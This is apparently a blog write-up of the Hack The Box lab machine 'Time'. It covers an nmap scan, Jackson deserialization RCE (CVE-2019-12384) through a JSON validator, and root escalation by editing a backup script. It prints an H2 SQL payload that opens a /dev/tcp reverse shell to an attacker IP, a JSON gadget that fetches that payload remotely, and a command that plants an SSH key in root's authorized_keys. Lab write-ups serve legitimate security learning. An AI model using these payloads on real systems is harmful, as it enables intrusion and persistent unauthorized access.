Hackthebox Time writeup | 10.10.10.214 | Whatinfotech

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech
Hackthebox Time writeup | 10.10.10.214 | Whatinfotech
4.4
(14)

Introduction

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech
NameTime
IP10.10.10.214
Points30
OSLinux
CreatoregotisticalSW & felamos

It was a great machine from hackthebox.It had only two ports open.And after testing the website got an error and got a CVE related to it .Rest was easy .For privilege escalation linpeas was enough.

Steps involved

1-Port Scan 
2-Website enumeration
3-Testing JSON validator (beta)
4-Exploiting JSON validator (beta ) via 
CVE-2019-12384 Jackson RCE And SSRF
5-Getting Shell and User flag
6-Privilege escalation (editing /usr/bin/timer_backup.sh)

Port Scan

hackthebox/10.10.10.214/time
➜ cat nmap
Nmap 7.80 scan initiated Fri Oct 30 00:17:15 2020 as: nmap -sC -sV -v -oN nmap 10.10.10.214
Nmap scan report for 10.10.10.214
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|http-favicon: Unknown favicon MD5: 7D4140C76BF7648531683BFA4F7F8C22 | http-methods: | Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Fri Oct 30 00:17:58 2020 -- 1 IP address (1 host up) scanned in 42.87 seconds

Only two ports are open 22 and 80.

Website enumeration

Let’s see the website

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech

So it says Online Json Beautifier & Validator.

JSON

JSON stands for JavaScript Object Notation. JSON is a lightweight format for storing and transporting data. JSON is often used when data is sent from a server to a web page.

Let’s take a JSON example and see the output.

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech

First checking the Beautifier option .

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech

It looks fine.

Testing JSON validator (beta)

Let’s see now validate(Beta).

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech

It says Validation Failed. But it is a JSON example. More over it’s Beta.

So let’s try some other inputs also in this option.

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech

It gives a error .

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'aaaaaaaaaaaa': was expecting ('true', 'false' or 'null')

Let’s google about this error.

Exploiting JSON validator (beta ) via
CVE-2019-12384 Jackson RCE And SSRF

After a lot of googling I got a CVE.

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech
Hackthebox Time writeup | 10.10.10.214 | Whatinfotech

So I thought to try this.

So this was my inject.sql

CVE-2019-12384 onmaster [!]
➜ cat inject.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('setsid bash -i &>/dev/tcp/10.10.14.154/9005 0>&1 &')

Now let’s call our files by following the above CVE.

["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.154:8000/inject.sql'"}]

paste this in validate(beta).

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech

Getting Shell and User flag

And we get the reverse shell easily .And also the user flag.

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech

Privilege Escalation (editing /usr/bin/timer_backup.sh)

Now let’s move to the root part .

Using linpeas for privilege escalation .

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech

Linpeas showed that root has been accessing this file: “/usr/bin/timer_backup.sh

So we added our ssh public keys to it .

echo "echo SSH_PUB_KEY >> /root/.ssh/authorized_keys" >> /usr/bin/timer_backup.sh

This adds our ssh keys to the root .ssh .So now we can easily access it using our private key and get the root.

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech

And we successfully login into root account .And got the root flag.

Hackthebox Time writeup | 10.10.10.214 | Whatinfotech

Thanks for Reading Have a Nice Day…//../..//

If you like my write ups please support me at https://www.buymeacoffee.com/gnOkD7Y

How useful was this post?

Click on a star to rate it!

Average rating 4.4 / 5. Vote count: 14

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *